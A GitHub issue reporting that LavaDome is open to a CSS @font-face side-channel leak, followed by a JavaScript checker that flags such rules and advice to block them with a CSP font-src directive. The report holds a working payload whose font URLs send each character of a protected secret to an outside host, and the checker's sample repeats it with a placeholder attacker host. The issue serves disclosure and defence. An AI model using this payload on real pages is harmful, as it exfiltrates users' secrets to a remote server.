LavaMoat/LavaDome

LavaDome is vulnerable to font-face based leak attack

Closed this issue · 1 comment

Based on @masatokinugawa's research (introduced to me by @mhofman), the following attack can exfiltrate relevant chars of the secret (with order most of the time) to a remote server when added to the demo app:

<style>
    @font-face{
        font-family:attack;
        src:url('//l0.cm/?Found:A');
        unicode-range:U+0041;
    }
    @font-face{
        font-family:attack;
        src:url('//l0.cm/?Found:B');
        unicode-range:U+0042;
    }
    @font-face{
        font-family:attack;
        src:url('//l0.cm/?Found:C');
        unicode-range:U+0043;
    }
    #PRIVATE{
        font-family:attack;
    }
</style>
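The rules above work as a side channel because the browser only fetches a `@font-face` source when it actually needs to render a character inside that face's `unicode-range`; one rule per code point turns each rendered character of the secret into a request. The following is an added example, not LavaDome project code or anything from the issue author: a small static checker that parses CSS text, pulls out every `@font-face` rule, and flags those that combine a cross-origin `src: url(...)` with a very narrow `unicode-range`. The sample CSS is constructed from the rules in the report with the hostname replaced by the placeholder `attacker.example`, and the threshold of 8 code points is an assumption chosen for illustration.

```javascript
// Added example (not LavaDome code): detect per-character @font-face
// exfiltration rules in a stylesheet. A rule is suspicious when its src
// is remote and its unicode-range covers only a handful of code points.

// Constructed sample modelled on the issue; hostname is a placeholder.
const SAMPLE_CSS = `
@font-face{ font-family:attack; src:url('//attacker.example/?Found:A'); unicode-range:U+0041; }
@font-face{ font-family:attack; src:url('//attacker.example/?Found:B'); unicode-range:U+0042; }
@font-face{ font-family:legit; src:url('/fonts/legit.woff2'); unicode-range:U+0000-00FF; }
@font-face{ font-family:icons; src:local('Icons'); }
#PRIVATE{ font-family:attack; }
`;

// Number of code points covered by a unicode-range value, e.g.
// "U+0041", "U+0041-0043", "U+00??" or a comma-separated list of these.
function countUnicodeRange(value) {
  let total = 0;
  for (const part of value.split(',').map((s) => s.trim()).filter(Boolean)) {
    const m = /^U\+([0-9A-F?]+)(?:-([0-9A-F]+))?$/i.exec(part);
    if (!m) return Infinity; // unparseable: treat as unrestricted, not suspicious
    if (m[1].includes('?')) {
      // each '?' wildcard stands for one hex digit (16 possibilities)
      total += 16 ** (m[1].split('?').length - 1);
    } else if (m[2]) {
      total += parseInt(m[2], 16) - parseInt(m[1], 16) + 1;
    } else {
      total += 1;
    }
  }
  return total;
}

// True when the src fetches from another origin (absolute http(s) or
// protocol-relative URL). local() sources and same-origin paths are not.
function isRemoteSrc(src) {
  return /url\(\s*['"]?(?:https?:)?\/\//i.test(src);
}

// Parse every @font-face block and report the suspicious ones.
// maxCodePoints (assumed threshold) bounds how narrow a range must be to be flagged.
function findFontFaceLeaks(cssText, maxCodePoints = 8) {
  const findings = [];
  const ruleRe = /@font-face\s*\{([^}]*)\}/gi;
  let match;
  while ((match = ruleRe.exec(cssText)) !== null) {
    const decls = {};
    for (const decl of match[1].split(';')) {
      const idx = decl.indexOf(':'); // first colon separates property from value
      if (idx < 0) continue;
      decls[decl.slice(0, idx).trim().toLowerCase()] = decl.slice(idx + 1).trim();
    }
    const src = decls['src'] || '';
    const range = decls['unicode-range'];
    if (!range || !isRemoteSrc(src)) continue;
    const covered = countUnicodeRange(range);
    if (covered <= maxCodePoints) {
      findings.push({
        family: decls['font-family'],
        src,
        unicodeRange: range,
        codePoints: covered,
      });
    }
  }
  return findings;
}

if (typeof module !== 'undefined' && require.main === module) {
  console.log(findFontFaceLeaks(SAMPLE_CSS));
}
```

On the sample, the two `attack` rules are reported and the `legit` and `icons` faces are not. A checker like this only catches stylesheets you can inspect; the robust defence for the protected element is to stop the font fetch from happening at all, for example by serving a Content-Security-Policy with a `font-src` directive that does not allow the attacker's origin, so that a `@font-face` rule injected into the page cannot reach a remote server even if it matches the secret's characters.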

fixed #17